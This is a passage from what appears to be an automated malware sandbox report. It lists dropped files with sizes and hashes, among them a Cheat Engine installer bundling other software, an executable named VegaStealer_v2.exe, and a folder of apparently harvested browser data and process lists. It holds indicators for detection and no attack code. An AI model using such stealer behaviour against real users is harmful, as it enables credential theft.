                                        0210cfddc082f6dfd9eead5d8fb64b5b6b70e8938246cfe8e530bc47c10e05a5

                                        SHA512

                                        702c8b0de00675331daf53075091a773bbc316aa9e4ab142c71640e508e08bcf98f9a828820aaf96adab4d133d5c65468e2294b4003f4d9942d43559dfef5043

                                      • C:\Program Files\MsEdgeCrashpad\settings.dat

                                        Filesize

                                        280B

                                        MD5

                                        42effbc31fd1a7ca31d7aa8d4bfd6f0d

                                        SHA1

                                        64ea61d88cd3e43fb2a2638d847cdf66c52e4ecb

                                        SHA256

                                        53cd8fa12c4491a1c87be392d2a69ef96bcfc06cca3416c598751e05a7f0bee8

                                        SHA512

                                        41768bfbda568e21cf5f826e2d31f8ee77d61d5e3539e6e3a97eaf7881ac528e29531b6040de70f9dc75bce9ba23ae81eb0941833b5dd414acc9ef88cab9387e

                                      • C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

                                        Filesize

                                        1KB

                                        MD5

                                        0d043b4975cb492bb1e31656be337042

                                        SHA1

                                        6bad763e9ebb35ae010a5d68b2286104e57b50c2

                                        SHA256

                                        3d4dedd416fa99024455fc5507cc1befd04e6e08ef826c3cc913a99c975300d1

                                        SHA512

                                        910a08abf4bcd0aabb518e0573f45ebec8d02a976403904de32d903e6cb2970c58e86f80c951c9c0370e23e27ed64310fab067498ca4becfe697a48b4b130df9

                                      • C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

                                        Filesize

                                        2KB

                                        MD5

                                        d9ab7357ea0a5e8df1b2835564ea001f

                                        SHA1

                                        b9ec41a620807825ae70494fdb8b78203ebd2543

                                        SHA256

                                        7bb10078ea8b178f40b0e6cdf0422d0e0103112d670b597b3ac03afed59a8a21

                                        SHA512

                                        dbd551ec05e1176d7fcc4966af218b1280967cb64a8d0a959bfe7c2aa16732a1e7ce628aaff62c1ddf67e9d17d891ea8674d6420ed1edd637569c7ab6f7d5940

                                      • C:\ProgramData\McAfee\WebAdvisor\TaskManager.dll\log_00200057003F001D0006.txt

                                        Filesize

                                        8KB

                                        MD5

                                        c8ae1b81596452fa6e3a5b44b67daad4

                                        SHA1

                                        fdc9ebaabe57c4ce3996000a5960daed2c2bf2d4

                                        SHA256

                                        bd7658a66980ea7574267abbc3c4e803f581219a76e1ba90f7f552f50ffa9090

                                        SHA512

                                        720060ba504f78f377c259906da828a1c7433a73d256baaeee62052d7e4bd991968ec402df9f5e91f890e9045e1886c918a454999844825cbd8ff132bb15dea9

                                      • C:\ProgramData\McAfee\WebAdvisor\updater.exe\log_00200057003F001D0006.txt

                                        Filesize

                                        1KB

                                        MD5

                                        efa4b5c7a538feeb1dd5670b673eef8b

                                        SHA1

                                        7dedafbf28abdad8cb24515db94fad527e5a4c36

                                        SHA256

                                        e9675d80cc33c177b3694748eb90a47b3ae5ba39481be7645a73e4c0a1d9b9bf

                                        SHA512

                                        57f2fa67a086c6e86e7c9ed4508e3c20aa040665c86dc1dc82840760726136eb5a6c24f278e37596a5757c4f995bb8fbcd07cdff588fcdc76482fe6b78590fa5

                                      • C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

                                        Filesize

                                        91KB

                                        MD5

                                        3479f811220f137368254bcc200c50b9

                                        SHA1

                                        5226e824f262d8b294a90a4e3840c4533057647e

                                        SHA256

                                        256840caf8923cc56cca5bd0e7e087330126f73a31d4ec217e1ddad5ce915180

                                        SHA512

                                        334464b3108f4b78bdc631fcabb9d93b94de113b901b405b08117965aaa3a064d8a28f490797bf621ed8ca0d95f5670518e911005b2007eb09f77ad83a50eb61

                                      • C:\ProgramData\Razer\GameManager\Logs\GameManagerClient_RazerCentralService.log

                                        Filesize

                                        2KB

                                        MD5

                                        25c503fae68edbdc8a8729243ba60994

                                        SHA1

                                        f9aba0e6393cec0b95383e3355fe12b318053f85

                                        SHA256

                                        5cc73c16a0580605a5e73d7dc65b113ddfc22b7d77fb4e4a41e518e5fc0b2714

                                        SHA512

                                        5d4d4b3e7b4fc74276c972af4c9cdf25a701443958943d554e9cab29ac1bbbe0017056e52c3d7cbc77ffd23aa5cbdcbd202a512f7a6ca0be89b4fcc8074fa1d3

                                      • C:\ProgramData\Razer\GameManager\Logs\GameManagerClient_RazerCentralService.log

                                        Filesize

                                        4KB

                                        MD5

                                        669a5e567b2e718d516e07b59a9d755f

                                        SHA1

                                        5810c51896233525ec699fc1e4a45c843652b5e1

                                        SHA256

                                        5b8b9f0cd9a91c2aac3000fa4bf3aa86f5e1bdbf18de2566df5344eaedd0a881

                                        SHA512

                                        dec90828e9ee5444eb778cc9488f8c9f6e32c15d7bed940d3abc6fb66e2faef79ef128b5d420443e5269853fe24a8974d2b130f15d26499403337c280d675e59

                                      • C:\ProgramData\Razer\Razer Central\Logs\Razer Central Service.log

                                        Filesize

                                        4KB

                                        MD5

                                        7df9cbd60ca5e6c1e29fae1bd92b4190

                                        SHA1

                                        21d735c08465dc1f292601c8f2d2aa39b8cf7926

                                        SHA256

                                        c87fba1a2276bde81e11a32da9f231734b44327d347f71277dae30a147b03b23

                                        SHA512

                                        3d8ac824425546b00bc7204b75dd871453957ac9181c19c6aab97dc9c870ea71e3e0495c8d7485e62a1768766b245fcefc64030c55bc817a360a7698b97835b7

                                      • C:\ProgramData\Razer\Razer Central\Update\Products.xml

                                        Filesize

                                        526B

                                        MD5

                                        0bd2e735b722cb72b8a108a97e3dc64e

                                        SHA1

                                        f3bee5c6b09367fc24a1897779c76b9f464d9feb

                                        SHA256

                                        c78e7aedc0a6a6540d613428241408a135ebd2548fc50e57fb7c9b9f183c8fe9

                                        SHA512

                                        610753974097b04192eca15e172f73f819c514cec4ab9b72686752d15bea45adda7d597758cb74277b708447fb45834cacafd1f5384573ef518e924a52dc88c7

                                      • C:\ProgramData\Razer\Razer Central\WebAppCache\Service Worker\CacheStorage\3882ad9bbb62368e55ef3b9865b36e7b855b24a0\6845d818-af26-4fc4-aafe-0a732c2d88ab\index

                                        Filesize

                                        24B

                                        MD5

                                        54cb446f628b2ea4a5bce5769910512e

                                        SHA1

                                        c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                        SHA256

                                        fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                        SHA512

                                        8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                      • C:\ProgramData\Razer\Razer Central\WebAppCache\Service Worker\Database\CURRENT

                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\ProgramData\Razer\Razer Central\WebAppCache\Service Worker\Database\MANIFEST-000001

                                        Filesize

                                        41B

                                        MD5

                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                        SHA1

                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                        SHA256

                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                        SHA512

                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        2KB

                                        MD5

                                        d85ba6ff808d9e5444a4b369f5bc2730

                                        SHA1

                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                        SHA256

                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                        SHA512

                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        62623d22bd9e037191765d5083ce16a3

                                        SHA1

                                        4a07da6872672f715a4780513d95ed8ddeefd259

                                        SHA256

                                        95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                        SHA512

                                        9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        527a9928cecda9d2298af8c230e09616

                                        SHA1

                                        2f532608be62f8ab209d3e4e73cbcd37105307fc

                                        SHA256

                                        fbe8557b69638d82318be932b227db8b5e1911d43d08300189f1ade1819e9cb4

                                        SHA512

                                        91bd4fd9c2157800fe46cc165fdf31fae4cfbde20252903c465869d8c97b9822bfddb40d98a0e1b42f869876286e3b526cdbde9e71d03c98eebce3ec3b8a9d33

                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\additional_file0.tmp

                                        Filesize

                                        2.7MB

                                        MD5

                                        be22df47dd4205f088dc18c1f4a308d3

                                        SHA1

                                        72acfd7d2461817450aabf2cf42874ab6019a1f7

                                        SHA256

                                        0eef85bccb5965037a5708216b3550792e46efdfdb99ac2396967d3de7a5e0c8

                                        SHA512

                                        833fc291aacecd3b2187a8cbd8e5be5b4d8884d86bd869d5e5019d727b94035a46bb56d7e7734403e088c2617506553a71a7184010447d1300d81667b99310c7

                                      • C:\Users\Admin\AppData\Local\Temp\3.exe

                                        Filesize

                                        3.5MB

                                        MD5

                                        a4c45aaf11fc601009a5682fd23790ee

                                        SHA1

                                        a8eac848583296b135af5a473fc8ce48af970b65

                                        SHA256

                                        d89c0e12b5fbbe103522fa152adb3edd6afff88d34d2bbf58caf28e9c4da0526

                                        SHA512

                                        cc735b14e4df0260c8302761e52fd84ba06310d2dde96c9089a8066f72b3b93d80c9e6548a18c35ecadd54479e99f80090ac31b7f30b682129b70b93095373a9

                                      • C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe

                                        Filesize

                                        5.5MB

                                        MD5

                                        71ad4fff7c190194c8a544776b54dcc5

                                        SHA1

                                        088b5a1acf87ddd917c1094d09a039e886df1f32

                                        SHA256

                                        37490d7b909307cf474a081d16d87320bfc05cd0d382b4ce0d2aec4459cea9d9

                                        SHA512

                                        fdf302eddba55c899883efe11df17977529dad6dc6d4c73e3811c01f98c9677de25a02c3aafa772dca78ed6d59a8bd062fec521d7ce385458dec02b4c971a557

                                      • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe

                                        Filesize

                                        28.6MB

                                        MD5

                                        ccef241f10766a2e12298fba4d319450

                                        SHA1

                                        955c0a80105b034ed46941845fc9bdbe8187ee64

                                        SHA256

                                        590d28762bc431046a202d7bbafb31f93fbbbc73a3c2291119b5c1139675b579

                                        SHA512

                                        d20a8f5afab8cd819ab81875ba9dba5c5ebb9ceadf4d53bf19e1e99c4f16d1361aa272f49571c69c6cc375afc8ac2f9c2e0293b5f2bf62f85cc5c23dfb3923f2

                                      • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

                                        Filesize

                                        571KB

                                        MD5

                                        169b6d383b7c650ab3ae2129397a6cf3

                                        SHA1

                                        fcaef7defb04301fd55fb1421bb15ef96d7040d6

                                        SHA256

                                        b896083feb2bdedc1568b62805dbd354c55e57f2d2469a52aec6c98f4ec2dedf

                                        SHA512

                                        7a7a7bdb508b8bf177249251c83b65a2ef4a5d8b29397cab130cb8444b23888678673a9a2e4b1c74cc095b358f923b9e7e5a91bfa8c240412d95765851f1dd87

                                      • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2412282113002514908.dll

                                        Filesize

                                        5.0MB

                                        MD5

                                        41daedcda16a5341463070dbac45624a

                                        SHA1

                                        8a2f6b3653d92a09a49baece476b53988fbf0c52

                                        SHA256

                                        733701d47b47b544d0b96343b521266702bd8e43edcb7c799c9cbaf07c7e3838

                                        SHA512

                                        7ebf69ed5d16ea1909890e6b714630975bc2cc7e3e4075c903ce6c33901b300ff632b1bbdf61558e4487d6fff3d7db78122a0bfa82e4cd57057685e1d1f7d159

                                      • C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

                                        Filesize

                                        1.3MB

                                        MD5

                                        0a1e95b0b1535203a1b8479dff2c03ff

                                        SHA1

                                        20c4b4406e8a3b1b35ca739ed59aa07ba867043d

                                        SHA256

                                        788d748b4d35dfd091626529457d91e9ebc8225746211086b14fb4a25785a51e

                                        SHA512

                                        854abcca8d807a98a9ad0ca5d2e55716c3ce26fae7ee4642796baf415c3cfad522b658963eafe504ecaed6c2ecdcdf332c9b01e43dfa342fcc5ca0fbedfe600e

                                      • C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

                                        Filesize

                                        410KB

                                        MD5

                                        056d3fcaf3b1d32ff25f513621e2a372

                                        SHA1

                                        851740bca46bab71d0b1d47e47f3eb8358cbee03

                                        SHA256

                                        66b64362664030bff1596cda2ec5bd5df48cc7c8313c32f771db4aa30a3f86f9

                                        SHA512

                                        ce47c581538f48a46d70279a62c702195beacbfafb48a5a862b3922625fe56f6887d1679c6d9366f946d3d2124cb31c2a3eacbbd14d601ea56e66575cdf46180

                                      • C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe

                                        Filesize

                                        7.7MB

                                        MD5

                                        9f4f298bcf1d208bd3ce3907cfb28480

                                        SHA1

                                        05c1cfde951306f8c6e9d484d3d88698c4419c62

                                        SHA256

                                        bf7057293d871cac087daab42daf22c1737a1df6adc7b7963989658f3b65f4cc

                                        SHA512

                                        4c763c3b6d4884f77083db5ccada59bc57803b3226294eff2ec3db8f2121ac01ee240b0e822cb090f5320ce40df545b477e323efabdbca31722731adc4b46806

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4prysw0.obd.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

                                        Filesize

                                        2KB

                                        MD5

                                        3220a6aefb4fc719cc8849f060859169

                                        SHA1

                                        85f624debcefd45fdfdf559ac2510a7d1501b412

                                        SHA256

                                        988cf422cbf400d41c48fbe491b425a827a1b70691f483679c1df02fb9352765

                                        SHA512

                                        5c45ea8f64b3cdfb262c642bd36b08c822427150d28977af33c9021a6316b6efed83f3172c16343fd703d351af3966b06926e5b33630d51b723709712689881d

                                      • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRZip.lmd

                                        Filesize

                                        1.7MB

                                        MD5

                                        1bbf5dd0b6ca80e4c7c77495c3f33083

                                        SHA1

                                        e0520037e60eb641ec04d1e814394c9da0a6a862

                                        SHA256

                                        bc6bd19ab0977ac794e18e2c82ace3116bf0537711a352638efd2d8d847c140b

                                        SHA512

                                        97bc810871868217f944bc5e60ab642f161c1f082bc9e4122094f10b4e309a6d96e3dd695553a20907cb8fea5aef4802f5a2f0a852328c1a1cd85944022abaab

                                      • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\THS_ICO.ICO

                                        Filesize

                                        124KB

                                        MD5

                                        f5e22645f63da2145175b1058bf219c0

                                        SHA1

                                        871678662fb992a726eb582bd5732b03e1f9b932

                                        SHA256

                                        d43b1eca75b9894be0dea9ee9f4bb424424a311fcb46385c185cc34a69cbf09d

                                        SHA512

                                        cabcf1109cbb06ac9d992fcff3f14a71661c7db10476b74730c946d41c118d6226743accbb3c6a41896aed7f1df9bff4bd4cd7047f0d4b617bc13075e3651d1f

                                      • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

                                        Filesize

                                        1.3MB

                                        MD5

                                        06a2e5e560c43a75e3fad213a293329e

                                        SHA1

                                        02b5da8171120f4df2a9d9f58072ad282430e906

                                        SHA256

                                        4782e7b9c070385e6e16820e60e93867fd88d5df333185b2b6719e8e054f771a

                                        SHA512

                                        b10eeac723a1f41d977f713a8676f4094a8dafb19a3bc554cfded033b152dc4539c2900ff3184a220804850c8c2accff9ee3dd44339d012e572e0b38ab706074

                                      • C:\Users\Admin\AppData\Local\Temp\is-FH3EJ.tmp\CheatEngine75.tmp

                                        Filesize

                                        3.1MB

                                        MD5

                                        e652d75d1d0d3f03b6b730e064e9194c

                                        SHA1

                                        c4220d57971c63a3f0b9f5b68560aedfdec18e64

                                        SHA256

                                        8958b8d498068bd0657587a04aaf011e7eabeb215276694366a154da8b55bdb9

                                        SHA512

                                        e5e5807224f0858d472584d06975dbe75677ad0a00727b63d1f8e2108dae179cb469ebae127be6c8d5b9de192bc741637fe1c8a9a4ef3ae46a3bde76b534a766

                                      • C:\Users\Admin\AppData\Local\Temp\is-PKDAV.tmp\CheatEngine75.tmp

                                        Filesize

                                        3.1MB

                                        MD5

                                        9aa2acd4c96f8ba03bb6c3ea806d806f

                                        SHA1

                                        9752f38cc51314bfd6d9acb9fb773e90f8ea0e15

                                        SHA256

                                        1b81562fdaeaa1bc22cbaa15c92bab90a12080519916cfa30c843796021153bb

                                        SHA512

                                        b0a00082c1e37efbfc2058887db60dabf6e9606713045f53db450f16ebae0296abfd73a025ffa6a8f2dcb730c69dd407f7889037182ce46c68367f54f4b1dc8d

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe

                                        Filesize

                                        26.1MB

                                        MD5

                                        e0f666fe4ff537fb8587ccd215e41e5f

                                        SHA1

                                        d283f9b56c1e36b70a74772f7ca927708d1be76f

                                        SHA256

                                        f88b0e5a32a395ab9996452d461820679e55c19952effe991dee8fedea1968af

                                        SHA512

                                        7f6cabd79ca7cdacc20be8f3324ba1fdaaff57cb9933693253e595bfc5af2cb7510aa00522a466666993da26ddc7df4096850a310d7cff44b2807de4e1179d1a

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\Opera_new.png

                                        Filesize

                                        49KB

                                        MD5

                                        b3a9a687108aa8afed729061f8381aba

                                        SHA1

                                        9b415d9c128a08f62c3aa9ba580d39256711519a

                                        SHA256

                                        194b65c682a76dc04ce9b675c5ace45df2586cc5b76664263170b56af51c8aeb

                                        SHA512

                                        14d10df29a3bb575c40581949d7c00312de08bb42578b7335792c057b83ab2878d44c87042bbdb6ec8ceaf763b4fbd8f080a27866fe92a1baf81c4f06705a0c4

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\Razer_Axon.png

                                        Filesize

                                        101KB

                                        MD5

                                        be18c7381e2c35a43ffb3317254d3a91

                                        SHA1

                                        e6694f69dfd1af946d6eefc3da3f28bc761e2012

                                        SHA256

                                        6cb5e764175604a8aa3abe7680aa612f3518bf301c0b0de3b334fd886ef7a1aa

                                        SHA512

                                        db433fb725f2c8ebe1ce2257249b626f992f7b7db60312c9d86bde2bcd9ea200a88765369503e7b97ef0471d0f2d21412d9b77b1d02291383a982acce894e2f1

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\WebAdvisor.png

                                        Filesize

                                        47KB

                                        MD5

                                        4cfff8dc30d353cd3d215fd3a5dbac24

                                        SHA1

                                        0f4f73f0dddc75f3506e026ef53c45c6fafbc87e

                                        SHA256

                                        0c430e56d69435d8ab31cbb5916a73a47d11ef65b37d289ee7d11130adf25856

                                        SHA512

                                        9d616f19c2496be6e89b855c41befc0235e3ce949d2b2ae7719c823f10be7fe0809bddfd93e28735b36271083dd802ae349b3ab7b60179b269d4a18c6cef4139

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\logo.png

                                        Filesize

                                        248KB

                                        MD5

                                        9cc8a637a7de5c9c101a3047c7fbbb33

                                        SHA1

                                        5e7b92e7ed3ca15d31a48ebe0297539368fff15c

                                        SHA256

                                        8c5c80bbc6b0fdb367eab1253517d8b156c85545a2d37d1ee4b78f3041d9b5db

                                        SHA512

                                        cf60556817dba2d7a39b72018f619b0dbea36fb227526943046b67d1ae501a96c838d6d5e3da64618592ac1e2fa14d4440baa91618aa66256f99ea2100a427b4

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0.zip

                                        Filesize

                                        515KB

                                        MD5

                                        f68008b70822bd28c82d13a289deb418

                                        SHA1

                                        06abbe109ba6dfd4153d76cd65bfffae129c41d8

                                        SHA256

                                        cc6f4faf4e8a9f4d2269d1d69a69ea326f789620fb98078cc98597f3cb998589

                                        SHA512

                                        fa482942e32e14011ae3c6762c638ccb0a0e8ec0055d2327c3acc381dddf1400de79e4e9321a39a418800d072e59c36b94b13b7eb62751d3aec990fb38ce9253

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\installer.exe

                                        Filesize

                                        22.8MB

                                        MD5

                                        7dd0faa9c00391333b2a12d21ca028bf

                                        SHA1

                                        2987248db6382971d36f80ea45c0ee654c672cd4

                                        SHA256

                                        e4b5817742a53dccc24cd2a266223045d03da537b815cb03b782d4e6baed5020

                                        SHA512

                                        ce700d9f59800c5a440d6dafb1844f60b793b254a2186cc3b39654c9341ac7eaac31d4a3f97b202ad40d17aab21d6b3f277e38179237996d617a8968dcd164c4

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\saBSI.exe

                                        Filesize

                                        1.1MB

                                        MD5

                                        143255618462a577de27286a272584e1

                                        SHA1

                                        efc032a6822bc57bcd0c9662a6a062be45f11acb

                                        SHA256

                                        f5aa950381fbcea7d730aa794974ca9e3310384a95d6cf4d015fbdbd9797b3e4

                                        SHA512

                                        c0a084d5c0b645e6a6479b234fa73c405f56310119dd7c8b061334544c47622fdd5139db9781b339bb3d3e17ac59fddb7d7860834ecfe8aad6d2ae8c869e1cb9

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1.zip

                                        Filesize

                                        2.1MB

                                        MD5

                                        93e74a1dfa2153fb7c32cbb1d6065517

                                        SHA1

                                        d8322d53232137462d1654c1fff556884c709c66

                                        SHA256

                                        72eed7f97751d0159d216b68d2a29e56c8502f00e3ed40219e9d8b4c97a3e69e

                                        SHA512

                                        4c60d01a04a6066bfa925a9b19ff4594a4b345bc77f836eed29ad1cc7ac849bac4cac5814e11b82c956e980cf7b357a76b5c76a7f31e5a4b089901a78a74585b

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1_extract\OperaSetup.exe

                                        Filesize

                                        2.1MB

                                        MD5

                                        7576a1bf33edb92ce3cac344de107afb

                                        SHA1

                                        7e14bbdcb24aa7aff21e9e0fac9ec8232c6eb0f2

                                        SHA256

                                        bca7e687a39ac52d8ddb0e95f0886ba3d194ff55a11cdf09fc2b0da9ebbad572

                                        SHA512

                                        800d79688c27b7e2c5dbb33434fad5d6a14063088daf4e281c86465bbdca8532c88e56574dd810d00d2db271b23c226e9fa65c653afc81df1b6acf88c4455d0a

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2.zip

                                        Filesize

                                        374KB

                                        MD5

                                        42cde6f10ea8538b69167cbd92d60c2c

                                        SHA1

                                        52bcb9605e35d4fe4f27bf0afabbef3dcd0b8af1

                                        SHA256

                                        3183647f88f9171deb6a6d8c494ae77d2d375e22151ecbfabde5c282dbb216f0

                                        SHA512

                                        8d183c17884a86072e7ff2ebfc822216d0bfde6aa4217cbd75d8a7c2727c2cf3196e1d4a74f12f92a6c979d9fdfa67e740e52cff90aa40183c2fd28c5e83ca8a

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2_extract\RazerLightInstaller.exe

                                        Filesize

                                        1.1MB

                                        MD5

                                        d34cb39a1543239d2b96cf1dddcb677c

                                        SHA1

                                        71eb3fcb2c48e08c23eab6a55c07357e72236011

                                        SHA256

                                        664fe521a3c14cd0cddc8036efd187aa2aab886adee339a8c4eaad60d304eed8

                                        SHA512

                                        b8d8289505c0b438749a03de7ba83a03fe1928615d50bcab07fb5ed35360e17369a2e41bfb7113d72292eda79795b93479c91034f22242a83fbcc4ef7c56eda8

                                      • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\zbShieldUtils.dll

                                        Filesize

                                        2.0MB

                                        MD5

                                        3037e3d5409fb6a697f12addb01ba99b

                                        SHA1

                                        5d80d1c9811bdf8a6ce8751061e21f4af532f036

                                        SHA256

                                        a860bd74595430802f4e2e7ad8fd1d31d3da3b0c9faf17ad4641035181a5ce9e

                                        SHA512

                                        80a78a5d18afc83ba96264638820d9eed3dae9c7fc596312ac56f7e0ba97976647f27bd86ea586524b16176280bd26daed64a3d126c3454a191b0adc2bc4e35d

                                      • C:\Users\Admin\AppData\Local\Temp\is-U7JT0.tmp\_isetup\_setup64.tmp

                                        Filesize

                                        6KB

                                        MD5

                                        e4211d6d009757c078a9fac7ff4f03d4

                                        SHA1

                                        019cd56ba687d39d12d4b13991c9a42ea6ba03da

                                        SHA256

                                        388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95

                                        SHA512

                                        17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

                                      • C:\Users\Admin\AppData\Local\Temp\v2.exe

                                        Filesize

                                        271KB

                                        MD5

                                        3f62213d184b639a0a62bcb1e65370a8

                                        SHA1

                                        bbf50b3c683550684cdb345d348e98fbe2fcafe0

                                        SHA256

                                        c692dfc29e70a17cabc19561e8e2662e1fe32fdba998a09fe1a8dc2b7e045b34

                                        SHA512

                                        0cd40d714e6a6ebd60cc0c8b0e339905a5f1198a474a531b1794fb562f27053f118718cc68b9652fef3411906f9d8ad22d0253af256fa1922133e9907298e803

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Browsers\Firefox\Bookmarks.txt

                                        Filesize

                                        105B

                                        MD5

                                        2e9d094dda5cdc3ce6519f75943a4ff4

                                        SHA1

                                        5d989b4ac8b699781681fe75ed9ef98191a5096c

                                        SHA256

                                        c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                        SHA512

                                        d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        135B

                                        MD5

                                        10189952051462776ddde77fa5dd4145

                                        SHA1

                                        a8d2d657c078955141442757fa0da227cd99b209

                                        SHA256

                                        be9f3c315e7aeb780b3d694040438a384f94d1c8371c0fb04c8e8a2799e65539

                                        SHA512

                                        a5f4c282b88216eae70ab35229ac621c8347351efad603ee090112a5bd1b755079557232e9e880fa70fabe222d9cb5daa3e318161fe4701069d2b86b26ff0218

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        225B

                                        MD5

                                        f03b8e5e163f47de2c0818fe2c0ee9fc

                                        SHA1

                                        7419f5f35aaee51744494da69988f8aaf2d26ebd

                                        SHA256

                                        b07e87e72086df2d6b0d762bec4bcc66b1c1dc32a393f7578d5f84e7d545c0b0

                                        SHA512

                                        34f627faba0f18d412c2a4c6af28a3948bd367ec14f52b2b2c04b2eb2f69f6eb2a8f451ae4652fd069ef71f7d921e4900c2481c1afb17617100c60afa32d3725

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        476B

                                        MD5

                                        1b49513cfa58108688d6b8b375428edb

                                        SHA1

                                        d6d4e9d75bb37f37b35ec1fd43ec1cd3776d86a8

                                        SHA256

                                        6511e2b6fad875e330627714174d70422024719f74a5529bae95bd1ed10a6441

                                        SHA512

                                        7aee7d21a76fbed720ae43056dbcbc2e8533de7b28e3db02b0ef76a163d70040eac4752bf8349bdb7e35eb89fac3f13f9478cfe7b7c46658beccc7180bb0c451

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        731B

                                        MD5

                                        bc34cb74ce5f9a2ae366faef04aaaabd

                                        SHA1

                                        1cf8ca970d25fd243155f06a2ad312052ec5de9e

                                        SHA256

                                        dc970b973bb0409bbcdf76dee48bbce6ae2741e9dcc84cbd7ec252f95d28f8f8

                                        SHA512

                                        da12e5ccf0c6b21d0005456050537d7aaedacda7fdc373c60c4688443861bc0445ceffc6db3ac341c59e4d40298ea455bfa00eeca0866d95b6a86d819678fd16

                                      • C:\Users\Admin\AppData\Roaming\FwVFyHRRGLZCSNLK.Admin\Process.txt

                                        Filesize

                                        988B

                                        MD5

                                        da776d6c15d8585344a7b5d0b019ae45

                                        SHA1

                                        57bb5656974012a5d63c4cb64ddd1201ddecef44

                                        SHA256

                                        c6116b0495c9e3f510a06f7211a298cee949c40fcabf2d9fc95cfab22e253f3e

                                        SHA512

